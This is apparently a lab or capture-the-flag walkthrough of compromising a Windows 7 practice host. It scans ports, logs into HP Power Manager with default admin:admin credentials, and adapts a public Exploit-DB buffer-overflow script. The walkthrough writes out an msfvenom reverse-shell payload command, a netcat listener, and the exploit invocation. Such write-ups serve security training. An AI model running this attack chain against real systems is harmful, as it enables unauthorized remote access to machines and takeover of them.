rustscan -a 192.168.152.45 --ulimit 5000
Open 192.168.152.45:80
Open 192.168.152.45:135
Open 192.168.152.45:139
Open 192.168.152.45:445
Open 192.168.152.45:3389
Open 192.168.152.45:3573
Open 192.168.152.45:49153
Open 192.168.152.45:49155
Open 192.168.152.45:49154
Open 192.168.152.45:49152
Open 192.168.152.45:49159
Open 192.168.152.45:49158
From the ports that are open (135, 139, 445, 3389) we can tell that we will be attacking a target running Windows.
Let's also run an nmap version and script scan to see if we can gather any more data on these open ports.
nmap -sCVS 192.168.152.45
Our target is running Windows 7 lol.
Let's check these SMB shares and see if guest login is allowed, using crackmapexec.
Good thing they disabled the guest account.
Let's check the service running on port 80.
I have never seen this before but hey, there is no way the login credentials will be admin:admin, right?
Well...
We are in, and some quick research on the site shows that this version of the software can be exploited.
This is an older lab but it's cool to see these attacks in action.
A quick Google search for "HP Power Manager 4.2 (Build 7) exploit" brings up an Exploit-DB page with a juicy exploit we can use on this target: https://www.exploit-db.com/exploits/10099
It looks like we are going to need to modify this script for our needs so we can capture the reverse shell.
The creator of the script uses alphanumeric shellcode.
This is likely because of the character filtering used by the HP Power Manager tool.
We can easily replace this shellcode with our own using msfvenom.
msfvenom -p windows/shell_reverse_tcp -b "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x3d\x3b\x2d\x2c\x2e\x24\x25\x1a" LHOST=$IP LPORT=4444 -e x86/alpha_mixed -f c
Note that we got the bad characters we need for this shellcode from reading some of the documentation that the script creator left for us here:
We replace the alphanumeric shellcode with our own from the generated output of our msfvenom command.
Now let's run this script and set up a listener.
nc -lvnp 4444
python2 10099.py 192.168.152.45
And it looks like we already have root access, no privilege escalation required... sick!